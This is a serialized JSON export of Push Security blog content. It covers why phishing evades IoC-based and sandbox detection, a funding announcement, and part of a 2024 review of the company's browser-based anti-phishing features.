first…",[],{},{"nodeType":312,"data":124975,"content":124978},{"target":124976},{"sys":124977},{"id":98333,"type":317,"linkType":318},[],{"nodeType":231,"data":124980,"content":124981},{},[],{"nodeType":169,"data":124983,"content":124984},{},[124985],{"nodeType":173,"value":124986,"marks":124987,"data":124989},"Why most phishing attacks are zero-day",[124988],{"type":370},{},{"nodeType":178,"data":124991,"content":124992},{},[124993],{"nodeType":173,"value":124994,"marks":124995,"data":124996},"Attackers know that phishing detection and blocking:",[],{},{"nodeType":250,"data":124998,"content":124999},{},[125000,125010,125020],{"nodeType":254,"data":125001,"content":125002},{},[125003],{"nodeType":178,"data":125004,"content":125005},{},[125006],{"nodeType":173,"value":125007,"marks":125008,"data":125009},"Relies on blocklisting IoCs like domains, URLs and IPs",[],{},{"nodeType":254,"data":125011,"content":125012},{},[125013],{"nodeType":178,"data":125014,"content":125015},{},[125016],{"nodeType":173,"value":125017,"marks":125018,"data":125019},"Is situated at the email and network layer",[],{},{"nodeType":254,"data":125021,"content":125022},{},[125023],{"nodeType":178,"data":125024,"content":125025},{},[125026],{"nodeType":173,"value":125027,"marks":125028,"data":125029},"Requires that a page is accessed and analyzed before it can be blocked",[],{},{"nodeType":178,"data":125031,"content":125032},{},[125033],{"nodeType":173,"value":125034,"marks":125035,"data":125036},"These methods have remained practically unchanged for more than a decade. So it stands to reason that attackers are getting pretty good at avoiding them. ",[],{},{"nodeType":235,"data":125038,"content":125039},{},[125040],{"nodeType":173,"value":125041,"marks":125042,"data":125044},"It’s easy for attackers to evade IoC-based detections",[125043],{"type":370},{},{"nodeType":178,"data":125046,"content":125047},{},[125048],{"nodeType":173,"value":125049,"marks":125050,"data":125051},"Phishing domains are highly disposable by nature. Attackers are buying them in bulk, constantly taking over legitimate domains, and generally planning for the fact that they’ll get through a lot of them.",[],{},{"nodeType":178,"data":125053,"content":125054},{},[125055],{"nodeType":173,"value":125056,"marks":125057,"data":125058},"Modern phishing architecture is also able to dynamically rotate and update commonly signatured elements — for example, by dynamically rotating the links served to visitors from a continually refreshed pool (so every person that clicks the link gets served a different URL) and even going as far as using things like one-time magic links (which also means that any security team members trying to investigate the page later won’t be able to do so). ",[],{},{"nodeType":178,"data":125060,"content":125061},{},[125062],{"nodeType":173,"value":125063,"marks":125064,"data":125065},"You could look at which IP address the user connects to, but these days it’s very simple for attackers to add a new IP to their cloud-hosted server. If a domain is flagged as known-bad, the attacker only has to register a new domain, or compromise a WordPress server on an already trusted domain. Both of these things are happening on a massive scale as attackers pre-plan for the fact that their domains will be burned at some point. ",[],{},{"nodeType":178,"data":125067,"content":125068},{},[125069],{"nodeType":173,"value":97966,"marks":125070,"data":125071},[],{},{"nodeType":235,"data":125073,"content":125074},{},[125075],{"nodeType":173,"value":125076,"marks":125077,"data":125079},"Phishing doesn’t just happen over email",[125078],{"type":370},{},{"nodeType":178,"data":125081,"content":125082},{},[125083],{"nodeType":173,"value":125084,"marks":125085,"data":125086},"To evade email-based detections, attackers are going multi- and cross-channel with their attacks. ",[],{},{"nodeType":312,"data":125088,"content":125091},{"target":125089},{"sys":125090},{"id":97821,"type":317,"linkType":318},[],{"nodeType":178,"data":125093,"content":125094},{},[125095],{"nodeType":173,"value":125096,"marks":125097,"data":125098},"Not only are attackers using different phishing vectors, they’re chaining them together to prevent security tools from intercepting the link. So for example, a social media message that sends you a non-malicious PDF with a link embedded in it, that finally directs you to a malicious webpage.",[],{},{"nodeType":178,"data":125100,"content":125101},{},[125102,125106,125110,125113,125117],{"nodeType":173,"value":125103,"marks":125104,"data":125105},"It’s worth also pointing out the limitations of email-based solutions here too. Email has some additional checks around the sender’s reputation and things like DMARC/DKIM, but these don’t actually identify malicious ",[],{},{"nodeType":173,"value":97831,"marks":125107,"data":125109},[125108],{"type":370},{},{"nodeType":173,"value":97836,"marks":125111,"data":125112},[],{},{"nodeType":173,"value":5440,"marks":125114,"data":125116},[125115],{"type":370},{},{"nodeType":173,"value":97844,"marks":125118,"data":125119},[],{},{"nodeType":178,"data":125121,"content":125122},{},[125123],{"nodeType":173,"value":125124,"marks":125125,"data":125126},"In any case, while modern email solutions can bring a lot more to the table, neither email or network (proxy) based tools can’t definitively know that a page is malicious unless they can access the page and analyze it… ",[],{},{"nodeType":235,"data":125128,"content":125129},{},[125130],{"nodeType":173,"value":125131,"marks":125132,"data":125134},"Attackers are preventing their pages from being analyzed",[125133],{"type":370},{},{"nodeType":178,"data":125136,"content":125137},{},[125138],{"nodeType":173,"value":125139,"marks":125140,"data":125141},"Both email and network (proxy) based solutions rely on being able to inspect and analyze a page to identify whether it is malicious or not, after which IoCs are generated that can be enforced when a link is clicked (or received in your email inbox).",[],{},{"nodeType":178,"data":125143,"content":125144},{},[125145],{"nodeType":173,"value":125146,"marks":125147,"data":125148},"Modern phishing pages aren’t static HTML — like most other modern web pages, these are dynamic web apps rendered in the browser, with JavaScript dynamically rewriting the page and launching the malicious content. This means that most basic, static checks fail to identify the malicious content running on the page. ",[],{},{"nodeType":178,"data":125150,"content":125151},{},[125152],{"nodeType":173,"value":125153,"marks":125154,"data":125155},"To address this, both email and network security tools will try to explode links in a sandbox to observe the page’s behavior. But attackers are getting around this simply by implementing bot protection by requiring user interaction with a CAPTCHA or Cloudflare Turnstile. ",[],{},{"nodeType":312,"data":125157,"content":125160},{"target":125158},{"sys":125159},{"id":97795,"type":317,"linkType":318},[],{"nodeType":178,"data":125162,"content":125163},{},[125164],{"nodeType":173,"value":125165,"marks":125166,"data":125167},"Even if you can get past Turnstile, then you’ll need to supply the correct URL parameters and headers, and execute JavaScript, to be served the malicious page. This means that a defender who knows the domain name can’t discover the malicious behavior just by making a simple HTTP(S) request to the domain.",[],{},{"nodeType":178,"data":125169,"content":125170},{},[125171,125174,125182],{"nodeType":173,"value":98005,"marks":125172,"data":125173},[],{},{"nodeType":186,"data":125175,"content":125177},{"uri":125176},"https://pushsecurity.com/blog/how-aitm-phishing-kits-evade-detection-p2/?utm_campaign=12100141-FY25Q2_Bleeping-Computer-Article&utm_source=bleepingcomputer&utm_medium=sponsored&utm_content=external-article",[125178],{"nodeType":173,"value":98013,"marks":125179,"data":125181},[125180],{"type":194},{},{"nodeType":173,"value":98018,"marks":125183,"data":125184},[],{},{"nodeType":231,"data":125186,"content":125187},{},[],{"nodeType":169,"data":125189,"content":125190},{},[125191],{"nodeType":173,"value":125192,"marks":125193,"data":125195},"Phishing attacks are zero-day because phishing detection is post mortem",[125194],{"type":370},{},{"nodeType":178,"data":125197,"content":125198},{},[125199,125203,125207],{"nodeType":173,"value":125200,"marks":125201,"data":125202},"The result of these detection evasion and obfuscation techniques is that ",[],{},{"nodeType":173,"value":98130,"marks":125204,"data":125206},[125205],{"type":370},{},{"nodeType":173,"value":197,"marks":125208,"data":125209},[],{},{"nodeType":178,"data":125211,"content":125212},{},[125213],{"nodeType":173,"value":98141,"marks":125214,"data":125215},[],{},{"nodeType":178,"data":125217,"content":125218},{},[125219,125222,125226,125229,125233,125236,125240,125243,125247],{"nodeType":173,"value":98148,"marks":125220,"data":125221},[],{},{"nodeType":173,"value":98152,"marks":125223,"data":125225},[125224],{"type":370},{},{"nodeType":173,"value":98157,"marks":125227,"data":125228},[],{},{"nodeType":173,"value":98161,"marks":125230,"data":125232},[125231],{"type":370},{},{"nodeType":173,"value":98166,"marks":125234,"data":125235},[],{},{"nodeType":173,"value":98161,"marks":125237,"data":125239},[125238],{"type":370},{},{"nodeType":173,"value":98174,"marks":125241,"data":125242},[],{},{"nodeType":173,"value":98178,"marks":125244,"data":125246},[125245],{"type":370},{},{"nodeType":173,"value":98183,"marks":125248,"data":125249},[],{},{"nodeType":178,"data":125251,"content":125252},{},[125253],{"nodeType":173,"value":125254,"marks":125255,"data":125257},"The result? Most phishing attacks are entirely novel because phishing detection is inherently post mortem — it relies on known-bads. How does something become known-bad? When a user is phished…",[125256],{"type":370},{},{"nodeType":231,"data":125259,"content":125260},{},[],{"nodeType":169,"data":125262,"content":125263},{},[125264],{"nodeType":173,"value":125265,"marks":125266,"data":125268},"To fix phishing detection, we need real-time analysis",[125267],{"type":370},{},{"nodeType":178,"data":125270,"content":125271},{},[125272],{"nodeType":173,"value":125273,"marks":125274,"data":125275},"It’s clear that how we detect and block phishing attacks is fundamentally flawed. The good news is, we’ve been here before. ",[],{},{"nodeType":178,"data":125277,"content":125278},{},[125279,125283,125287],{"nodeType":173,"value":125280,"marks":125281,"data":125282},"When endpoint attacks skyrocketed in the late 2000s / early 2010s, they took advantage of the fact that defenders were trying to detect malware with primarily network-based detections, signature-based analysis of files, and running files in sandboxes (which was reliably defeated with sandbox-aware malware and using things as simple as putting an execution delay in the code). But this gave way to EDR, which presented a better way of observing and intercepting malicious software in ",[],{},{"nodeType":173,"value":97888,"marks":125284,"data":125286},[125285],{"type":370},{},{"nodeType":173,"value":197,"marks":125288,"data":125289},[],{},{"nodeType":312,"data":125291,"content":125294},{"target":125292},{"sys":125293},{"id":97899,"type":317,"linkType":318},[],{"nodeType":178,"data":125296,"content":125297},{},[125298],{"nodeType":173,"value":97905,"marks":125299,"data":125300},[],{},{"nodeType":178,"data":125302,"content":125303},{},[125304],{"nodeType":173,"value":97912,"marks":125305,"data":125306},[],{},{"nodeType":178,"data":125308,"content":125309},{},[125310],{"nodeType":173,"value":125311,"marks":125312,"data":125313},"In many ways, the browser is the new Operating System. It’s where modern work predominantly takes place — and where attacks are happening too.  ",[],{},{"nodeType":312,"data":125315,"content":125318},{"target":125316},{"sys":125317},{"id":97919,"type":317,"linkType":318},[],{"nodeType":178,"data":125320,"content":125321},{},[125322],{"nodeType":173,"value":125323,"marks":125324,"data":125325},"To stop phishing attacks as they happen, we need to be able to observe the page in real-time, as the user sees it from inside the browser. Not in a sandbox — seeing the real page, at the same time as the user. Only then can we build the detection and containment controls required to move phishing beyond the current cat-and-mouse game, where attackers are always two steps ahead. ",[],{},{"nodeType":312,"data":125327,"content":125330},{"target":125328},{"sys":125329},{"id":98089,"type":317,"linkType":318},[],{"nodeType":231,"data":125332,"content":125333},{},[],{"nodeType":169,"data":125335,"content":125336},{},[125337],{"nodeType":173,"value":98205,"marks":125338,"data":125340},[125339],{"type":370},{},{"nodeType":178,"data":125342,"content":125343},{},[125344],{"nodeType":173,"value":98213,"marks":125345,"data":125346},[],{},{"nodeType":312,"data":125348,"content":125351},{"target":125349},{"sys":125350},{"id":98102,"type":317,"linkType":318},[],{"nodeType":312,"data":125353,"content":125356},{"target":125354},{"sys":125355},{"id":98333,"type":317,"linkType":318},[],{"nodeType":3769,"data":125358,"content":125359},{},[125360],{"nodeType":178,"data":125361,"content":125362},{},[125363,125366,125374],{"nodeType":173,"value":61741,"marks":125364,"data":125365},[],{},{"nodeType":186,"data":125367,"content":125369},{"uri":125368},"https://pushsecurity.com/demo?utm_campaign=12100141-FY25Q2_Bleeping-Computer-Article&utm_source=bleepingcomputer&utm_medium=sponsored&utm_content=external-article",[125370],{"nodeType":173,"value":1472,"marks":125371,"data":125373},[125372],{"type":194},{},{"nodeType":173,"value":1477,"marks":125375,"data":125376},[],{},{"nodeType":178,"data":125378,"content":125379},{},[125380],{"nodeType":173,"value":37,"marks":125381,"data":125382},[],{},{"entries":125384},{"hyperlink":125385,"inline":125386,"block":125387},[],[],[125388,125395,125397,125400,125403,125406,125409,125412],{"sys":125389,"__typename":5345,"title":125390,"caption":118,"layoutMode":118,"file":125391},{"id":124965},"IoC-based blocklists underpin phishing detection and blocking",{"url":125392,"width":125393,"height":125394},"https://images.ctfassets.net/y1cdw1ablpvd/7xI33nDHdy4CsCARPa7K27/d42254dd924c9dca70437d7277d37328/Screenshot_2025-04-28_at_14.46.57.png",1932,836,{"sys":125396,"__typename":15269,"type":15270,"ctaText":121051,"buttonLabel":64975,"buttonColour":15273,"buttonUrl":121052},{"id":98333},{"sys":125398,"__typename":5345,"title":123325,"caption":123325,"layoutMode":118,"file":125399},{"id":97821},{"url":123327,"width":5358,"height":123328},{"sys":125401,"__typename":5345,"title":123318,"caption":123318,"layoutMode":118,"file":125402},{"id":97795},{"url":123320,"width":123321,"height":123322},{"sys":125404,"__typename":5345,"title":123331,"caption":118,"layoutMode":118,"file":125405},{"id":97899},{"url":123333,"width":5358,"height":123334},{"sys":125407,"__typename":5345,"title":123337,"caption":123337,"layoutMode":118,"file":125408},{"id":97919},{"url":96398,"width":96399,"height":96400},{"sys":125410,"__typename":5345,"title":123341,"caption":123342,"layoutMode":118,"file":125411},{"id":98089},{"url":123344,"width":5358,"height":123345},{"sys":125413,"__typename":5345,"title":123348,"caption":123349,"layoutMode":118,"file":125414},{"id":98102},{"url":96405,"width":96406,"height":96407},"content:blog:why-most-phishing-attacks-feel-like-a-zero-day.json","blog/why-most-phishing-attacks-feel-like-a-zero-day.json","blog/why-most-phishing-attacks-feel-like-a-zero-day",{"_path":125419,"_dir":1500,"_draft":6,"_partial":6,"_locale":37,"sys":125420,"summary":125422,"title":117925,"subtitle":118,"metaTitle":125433,"synopsis":117926,"hashTags":118,"publishedDate":117927,"slug":117928,"ogImage":125434,"tagsCollection":125436,"relatedBlogPostsCollection":125440,"authorsCollection":127319,"content":127323,"_id":127701,"_type":5439,"_source":5440,"_file":127702,"_stem":127703,"_extension":5439},"/blog/series-b-and-beyond",{"id":117506,"publishedAt":125421},"2025-10-22T13:03:45.496Z",{"json":125423},{"data":125424,"content":125425,"nodeType":165},{},[125426],{"data":125427,"content":125428,"nodeType":178},{},[125429],{"data":125430,"marks":125431,"value":125432,"nodeType":173},{},[],"I’m thrilled to share that Push Security has raised our Series B funding. This is a big moment for us — and more importantly, for the future of identity security.","Announcing Push Security's Series B Funding",{"url":125435},"https://images.ctfassets.net/y1cdw1ablpvd/1R9erAyDgxQY8ghSXp8WaD/93bc15863b4ce6e6abecdf22d2eeb832/Social_graphic__5_.png",{"items":125437},[125438],{"sys":125439,"name":117242},{"id":117241},{"items":125441},[125442,126619],{"__typename":1528,"sys":125443,"content":125445,"title":126606,"synopsis":126607,"hashTags":118,"publishedDate":71823,"slug":126608,"tagsCollection":126609,"authorsCollection":126615},{"id":125444},"5KqYY7p174lSpuinfTfEZU",{"json":125446},{"data":125447,"content":125448,"nodeType":165},{},[125449,125456,125511,125518,125521,125528,125535,125568,125580,125583,125590,125600,125607,125626,125632,125651,125658,125668,125688,125708,125715,125734,125740,125760,125763,125770,125777,125784,125803,125821,125828,125847,125854,125861,125885,125892,125911,125931,125937,125944,125963,125966,125973,125991,126010,126017,126070,126077,126080,126087,126094,126113,126133,126140,126147,126154,126173,126180,126187,126192,126198,126201,126208,126215,126222,126241,126251,126270,126277,126284,126294,126301,126308,126328,126334,126337,126344,126351,126358,126429,126436,126443,126450,126458,126479,126486,126492,126503,126524,126531,126539,126558,126565,126572,126578,126581,126588],{"data":125450,"content":125451,"nodeType":178},{},[125452],{"data":125453,"marks":125454,"value":125455,"nodeType":173},{},[],"From massive breaches like the Snowflake incident to novel phishing techniques documented by Push researchers, 2024 was the year that identity attacks left their mark. Looking back over what we saw in the wild and what we found through Push’s own research, three key themes stand out:",{"data":125457,"content":125458,"nodeType":250},{},[125459,125478,125488],{"data":125460,"content":125461,"nodeType":254},{},[125462],{"data":125463,"content":125464,"nodeType":178},{},[125465,125469,125474],{"data":125466,"marks":125467,"value":125468,"nodeType":173},{},[],"Account takeover techniques on cloud apps are fundamentally different from traditional network-based attacks. To have the best chance of preventing account takeover, defenders need to  disrupt attacks ",{"data":125470,"marks":125471,"value":125473,"nodeType":173},{},[125472],{"type":1646},"before",{"data":125475,"marks":125476,"value":125477,"nodeType":173},{},[]," they’re successful.",{"data":125479,"content":125480,"nodeType":254},{},[125481],{"data":125482,"content":125483,"nodeType":178},{},[125484],{"data":125485,"marks":125486,"value":125487,"nodeType":173},{},[],"It’s not easy or practical to maintain 100 percent compliance on identity posture standards in a world where employees are using and signing up to apps outside of IT oversight — but it is possible to make this work a lot easier by using tools that help you scale your remediation activities.",{"data":125489,"content":125490,"nodeType":254},{},[125491],{"data":125492,"content":125493,"nodeType":178},{},[125494,125498,125507],{"data":125495,"marks":125496,"value":125497,"nodeType":173},{},[],"Despite another year where cybersecurity spend increased (now up to almost $1,100 per user, according to ",{"data":125499,"content":125501,"nodeType":186},{"uri":125500},"https://www.forrester.com/report/2024-cybersecurity-benchmarks-global/RES181118",[125502],{"data":125503,"marks":125504,"value":125506,"nodeType":173},{},[125505],{"type":194},"Forrester",{"data":125508,"marks":125509,"value":125510,"nodeType":173},{},[],"), existing approaches are not successfully preventing account takeovers. Security teams need to be able to detect and respond to these attacks where they happen: The browser.",{"data":125512,"content":125513,"nodeType":178},{},[125514],{"data":125515,"marks":125516,"value":125517,"nodeType":173},{},[],"In this article, we’ll take a look back at how these themes influenced key features we delivered for Push customers in 2024.",{"data":125519,"content":125520,"nodeType":231},{},[],{"data":125522,"content":125523,"nodeType":169},{},[125524],{"data":125525,"marks":125526,"value":125527,"nodeType":173},{},[],"Defending against modern phishing attacks",{"data":125529,"content":125530,"nodeType":178},{},[125531],{"data":125532,"marks":125533,"value":125534,"nodeType":173},{},[],"Phishing techniques that bypass MFA are now the norm, and few organizations have successfully achieved full coverage of phishing-resistant MFA methods. ",{"data":125536,"content":125537,"nodeType":178},{},[125538,125542,125551,125555,125564],{"data":125539,"marks":125540,"value":125541,"nodeType":173},{},[],"Equally, while phishing attacks via email remain the most commonly reported vector, phishing attacks increasingly target users outside of email. For example, phishing links are often encountered through normal internet use — such as ",{"data":125543,"content":125545,"nodeType":186},{"uri":125544},"https://www.bleepingcomputer.com/news/security/hackers-use-google-search-ads-to-steal-google-ads-accounts/",[125546],{"data":125547,"marks":125548,"value":125550,"nodeType":173},{},[125549],{"type":194},"in malicious Google ads",{"data":125552,"marks":125553,"value":125554,"nodeType":173},{},[]," — and attackers frequently conduct their campaigns over IM platforms like Slack and Teams. Late last year there was ",{"data":125556,"content":125558,"nodeType":186},{"uri":125557},"https://www.linkedin.com/posts/kevin-beaumont-security_ive-been-assisting-a-few-orgs-hit-with-successful-activity-7268055739116445701-xxjZ?utm_source=share&utm_medium=member_desktop",[125559],{"data":125560,"marks":125561,"value":125563,"nodeType":173},{},[125562],{"type":194},"a rise in attackers inundating users with spam via Teams",{"data":125565,"marks":125566,"value":125567,"nodeType":173},{},[],", combined with phone scams posing as IT admins. Since anti-phishing controls are usually email-based, they fail to protect users from attacks taking place elsewhere. ",{"data":125569,"content":125570,"nodeType":178},{},[125571,125575],{"data":125572,"marks":125573,"value":125574,"nodeType":173},{},[],"At Push, we’ve built a suite of anti-phishing features over the last year that act as a defense-in-depth approach to the types of modern phishing techniques we’ve been observing in the wild. ",{"data":125576,"marks":125577,"value":125579,"nodeType":173},{},[125578],{"type":370},"Here’s what we built and why.",{"data":125581,"content":125582,"nodeType":231},{},[],{"data":125584,"content":125585,"nodeType":169},{},[125586],{"data":125587,"marks":125588,"value":125589,"nodeType":173},{},[],"Protecting passwords used for SSO",{"data":125591,"content":125592,"nodeType":235},{},[125593,125597],{"data":125594,"marks":125595,"value":77025,"nodeType":173},{},[125596],{"type":370},{"data":125598,"marks":125599,"value":3107,"nodeType":173},{},[],{"data":125601,"content":125602,"nodeType":178},{},[125603],{"data":125604,"marks":125605,"value":125606,"nodeType":173},{},[],"Attackers explicitly targeted Okta, Entra, and Google Workspace accounts in 2023 and 2024, so we knew a top priority would be protecting identity provider accounts. These IdP accounts are a key target because they allow attackers to move laterally to other valuable apps and data via SSO following the initial account takeover.",{"data":125608,"content":125609,"nodeType":178},{},[125610,125614,125622],{"data":125611,"marks":125612,"value":125613,"nodeType":173},{},[],"It’s not just the typical IdPs you need to watch out for, either: Apps like GitHub, Slack, Salesforce, Facebook, X, and others all provide SSO functionality, increasing the blast radius of a compromise. And as we reported in ",{"data":125615,"content":125616,"nodeType":186},{"uri":40823},[125617],{"data":125618,"marks":125619,"value":125621,"nodeType":173},{},[125620],{"type":194},"our research on cross-IdP impersonation",{"data":125623,"marks":125624,"value":125625,"nodeType":173},{},[],", apps can be accessed using multiple SSO methods simultaneously — and 3 in 5 apps that we tested recently did not require re-verification by default when adding a new login method.",{"data":125627,"content":125631,"nodeType":312},{"target":125628},{"sys":125629},{"id":125630,"type":317,"linkType":318},"3EOOr4dVQoiPjl2ucUs1mA",[],{"data":125633,"content":125634,"nodeType":178},{},[125635,125639,125647],{"data":125636,"marks":125637,"value":125638,"nodeType":173},{},[],"Phishing is a problem that would be significantly reduced in a world without passwords. But while the ideal case is that organizations can put in place phishing-resistant authentication methods like passkeys or other WebAuthn-based methods, the reality is that ",{"data":125640,"content":125641,"nodeType":186},{"uri":111565},[125642],{"data":125643,"marks":125644,"value":125646,"nodeType":173},{},[125645],{"type":194},"it’s not a perfect solution right now",{"data":125648,"marks":125649,"value":125650,"nodeType":173},{},[]," — widespread passkey implementation is hard to achieve.",{"data":125652,"content":125653,"nodeType":178},{},[125654],{"data":125655,"marks":125656,"value":125657,"nodeType":173},{},[],"One of the key advantages of passkeys is that they are domain-bound: Meaning they can’t be used on a site with the wrong domain. So, we started thinking: What if it were possible to essentially domain-bind a password? ",{"data":125659,"content":125660,"nodeType":235},{},[125661,125665],{"data":125662,"marks":125663,"value":24287,"nodeType":173},{},[125664],{"type":370},{"data":125666,"marks":125667,"value":3107,"nodeType":173},{},[],{"data":125669,"content":125670,"nodeType":178},{},[125671,125675,125684],{"data":125672,"marks":125673,"value":125674,"nodeType":173},{},[],"In the first half of 2024, we delivered our ",{"data":125676,"content":125677,"nodeType":186},{"uri":9099},[125678],{"data":125679,"marks":125680,"value":125683,"nodeType":173},{},[125681,125682],{"type":194},{"type":370},"SSO password protection",{"data":125685,"marks":125686,"value":125687,"nodeType":173},{},[]," feature, which allows Push administrators to block employees from entering their IdP password into any site that’s not the identity provider — in effect domain-binding SSO credentials. ",{"data":125689,"content":125690,"nodeType":178},{},[125691,125695,125704],{"data":125692,"marks":125693,"value":125694,"nodeType":173},{},[],"Push accomplishes this via the Push browser agent, which ",{"data":125696,"content":125698,"nodeType":186},{"uri":125697},"https://pushsecurity.com/help/10109/#how-does-sso-password-protection-work",[125699],{"data":125700,"marks":125701,"value":125703,"nodeType":173},{},[125702],{"type":194},"observes and fingerprints",{"data":125705,"marks":125706,"value":125707,"nodeType":173},{},[]," the user’s SSO password and legitimate SSO login pages, and then enforces in-browser controls to prevent an SSO password from being submitted on any URL that doesn’t match the legitimate provider, an extremely strong anti-phishing protection. Separately, Push also verifies that passwords it observes are not easily guessable.",{"data":125709,"content":125710,"nodeType":178},{},[125711],{"data":125712,"marks":125713,"value":125714,"nodeType":173},{},[],"The idea behind this approach is to gain some similar benefits to passkeys — by ensuring that passwords used for SSO access to your apps cannot be phished and are unique and strong — but in a way that “just works” with existing password-based authentication. ",{"data":125716,"content":125717,"nodeType":178},{},[125718,125722,125730],{"data":125719,"marks":125720,"value":125721,"nodeType":173},{},[],"Organizations that monitor for SSO password reuse will find that the practice turns out to be incredibly widespread, so being able to detect and prevent password reuse — even outside of actual phishing attempts — is an asset to security teams. (Our ",{"data":125723,"content":125724,"nodeType":186},{"uri":4492},[125725],{"data":125726,"marks":125727,"value":125729,"nodeType":173},{},[125728],{"type":194},"research shows",{"data":125731,"marks":125732,"value":125733,"nodeType":173},{},[]," that 10% of IdP accounts are using a password that is shared with another app — where it is much more likely to be compromised.) ",{"data":125735,"content":125739,"nodeType":312},{"target":125736},{"sys":125737},{"id":125738,"type":317,"linkType":318},"4Ce999wf4mqCZwu1jLofsx",[],{"data":125741,"content":125742,"nodeType":178},{},[125743,125747,125756],{"data":125744,"marks":125745,"value":125746,"nodeType":173},{},[],"By streaming events to your SIEM and setting up a simple automation, you can also use Push-supplied intelligence on SSO password reuse to ",{"data":125748,"content":125750,"nodeType":186},{"uri":125749},"https://pushsecurity.com/blog/automating-sso-password-resets-using-push/",[125751],{"data":125752,"marks":125753,"value":125755,"nodeType":173},{},[125754],{"type":194},"automatically reset",{"data":125757,"marks":125758,"value":125759,"nodeType":173},{},[]," potentially compromised passwords — this provides instant response to successful phishing and gets rid of password re-use of your most sensitive credentials in one move - the kind of combo we love!",{"data":125761,"content":125762,"nodeType":231},{},[],{"data":125764,"content":125765,"nodeType":169},{},[125766],{"data":125767,"marks":125768,"value":125769,"nodeType":173},{},[],"Blocking AitM phishing and cloned login pages",{"data":125771,"content":125772,"nodeType":235},{},[125773],{"data":125774,"marks":125775,"value":77025,"nodeType":173},{},[125776],{"type":370},{"data":125778,"content":125779,"nodeType":178},{},[125780],{"data":125781,"marks":125782,"value":125783,"nodeType":173},{},[],"When you’re able to detect SSO passwords being used in all the wrong places, it’s not surprising that one of the main offenders is phishing attacks. ",{"data":125785,"content":125786,"nodeType":178},{},[125787,125791,125799],{"data":125788,"marks":125789,"value":125790,"nodeType":173},{},[],"In 2024, we wrote extensively about the rise in ",{"data":125792,"content":125793,"nodeType":186},{"uri":49844},[125794],{"data":125795,"marks":125796,"value":125798,"nodeType":173},{},[125797],{"type":194},"modern phishing attacks",{"data":125800,"marks":125801,"value":125802,"nodeType":173},{},[]," that use adversary-in-the middle toolkits (AiTM), including EvilNoVNC, Evilginx, and others.",{"data":125804,"content":125805,"nodeType":178},{},[125806,125810,125818],{"data":125807,"marks":125808,"value":125809,"nodeType":173},{},[],"AiTM phishing is a newer variant of phishing that allows attackers to bypass MFA protection by using tools that act as a proxy between the end-user and a legitimate login portal. AitM attacks increased 146% in 2023 (",{"data":125811,"content":125813,"nodeType":186},{"uri":125812},"https://cdn-dynmedia-1.microsoft.com/is/content/microsoftcorp/microsoft/final/en-us/microsoft-brand/documents/Microsoft%20Digital%20Defense%20Report%202024%20%281%29.pdf",[125814],{"data":125815,"marks":125816,"value":1255,"nodeType":173},{},[125817],{"type":194},{"data":125819,"marks":125820,"value":53584,"nodeType":173},{},[],{"data":125822,"content":125823,"nodeType":178},{},[125824],{"data":125825,"marks":125826,"value":125827,"nodeType":173},{},[],"This trend in tradecraft was reflected in our own customer base last year, but what’s interesting is that we observed a lot of phish kits and tactics that were new — meaning traditional detections failed to find them before Push did. ",{"data":125829,"content":125830,"nodeType":178},{},[125831,125835,125843],{"data":125832,"marks":125833,"value":125834,"nodeType":173},{},[],"In particular, we saw newer ",{"data":125836,"content":125837,"nodeType":186},{"uri":74693},[125838],{"data":125839,"marks":125840,"value":125842,"nodeType":173},{},[125841],{"type":194},"web-based obfuscation techniques",{"data":125844,"marks":125845,"value":125846,"nodeType":173},{},[]," that allowed attackers to get past the features of email security tools like web gateways and email scanning appliances, such as bypassing web sandbox analysis, and deter other forms of automated investigation by using Cloudflare Turnstile and other tactics — similar to the approaches legit websites use to protect against automated bots (this is essentially the same problem for both).",{"data":125848,"content":125849,"nodeType":178},{},[125850],{"data":125851,"marks":125852,"value":125853,"nodeType":173},{},[],"The gap in existing controls was obvious: When all phishing routes eventually lead to the browser, security teams need to be able to detect and respond in the browser. To do this well they need to observe what the employee sees, not what loads in a sandbox.",{"data":125855,"content":125856,"nodeType":235},{},[125857],{"data":125858,"marks":125859,"value":24287,"nodeType":173},{},[125860],{"type":370},{"data":125862,"content":125863,"nodeType":178},{},[125864,125868,125877,125882],{"data":125865,"marks":125866,"value":125867,"nodeType":173},{},[],"To address this gap, we released new capabilities for the Push browser agent to be able to ",{"data":125869,"content":125870,"nodeType":186},{"uri":75048},[125871],{"data":125872,"marks":125873,"value":125876,"nodeType":173},{},[125874,125875],{"type":194},{"type":370},"detect and block",{"data":125878,"marks":125879,"value":125881,"nodeType":173},{},[125880],{"type":370}," when a site is running AiTM phishing toolkits",{"data":125883,"marks":125884,"value":197,"nodeType":173},{},[],{"data":125886,"content":125887,"nodeType":178},{},[125888],{"data":125889,"marks":125890,"value":125891,"nodeType":173},{},[],"Push does this via a set of readymade detections for common AiTM tools. By dynamically analyzing the behavior of malware in the browser, the Push browser agent can find indicators of compromise beyond just domains, file names, IP addresses, etc., focusing instead on behavioral attributes, such as Javascript calls being made or data structures saved to local storage.",{"data":125893,"content":125894,"nodeType":178},{},[125895,125899,125907],{"data":125896,"marks":125897,"value":125898,"nodeType":173},{},[],"This approach of focusing on the top of the ",{"data":125900,"content":125902,"nodeType":186},{"uri":125901},"https://pushsecurity.com/blog/our-design-philosophy-detecting-what-matters/#id-building-effective-identity-threat-detection-controls_id-scenario-detecting-a-web-based-phishing-attack",[125903],{"data":125904,"marks":125905,"value":74524,"nodeType":173},{},[125906],{"type":194},{"data":125908,"marks":125909,"value":125910,"nodeType":173},{},[]," — e.g. building detections for attributes of an attack that are the hardest for attackers to change, and therefore the most reliably accurate — is core to Push’s design philosophy. ",{"data":125912,"content":125913,"nodeType":178},{},[125914,125918,125927],{"data":125915,"marks":125916,"value":125917,"nodeType":173},{},[],"Finally, toward the second half of the year, we released ",{"data":125919,"content":125920,"nodeType":186},{"uri":75027},[125921],{"data":125922,"marks":125923,"value":125926,"nodeType":173},{},[125924,125925],{"type":194},{"type":370},"cloned login page detection",{"data":125928,"marks":125929,"value":125930,"nodeType":173},{},[],", a natural extension of our layered approach to preventing phishing attacks in the browser. With this security control, you can identify malicious webpages that are masquerading as legitimate IdP login portals. ",{"data":125932,"content":125936,"nodeType":312},{"target":125933},{"sys":125934},{"id":125935,"type":317,"linkType":318},"4y25OxesssUk9lzEx12HFa",[],{"data":125938,"content":125939,"nodeType":178},{},[125940],{"data":125941,"marks":125942,"value":125943,"nodeType":173},{},[],"When a cloned login page is detected, you can add the URL to your blocklist in Push and prevent any other employees from being targeted. ",{"data":125945,"content":125946,"nodeType":178},{},[125947,125951,125959],{"data":125948,"marks":125949,"value":125950,"nodeType":173},{},[],"By layering multiple anti-phishing controls that all prevent account takeover, defenders have the best chance at thwarting the 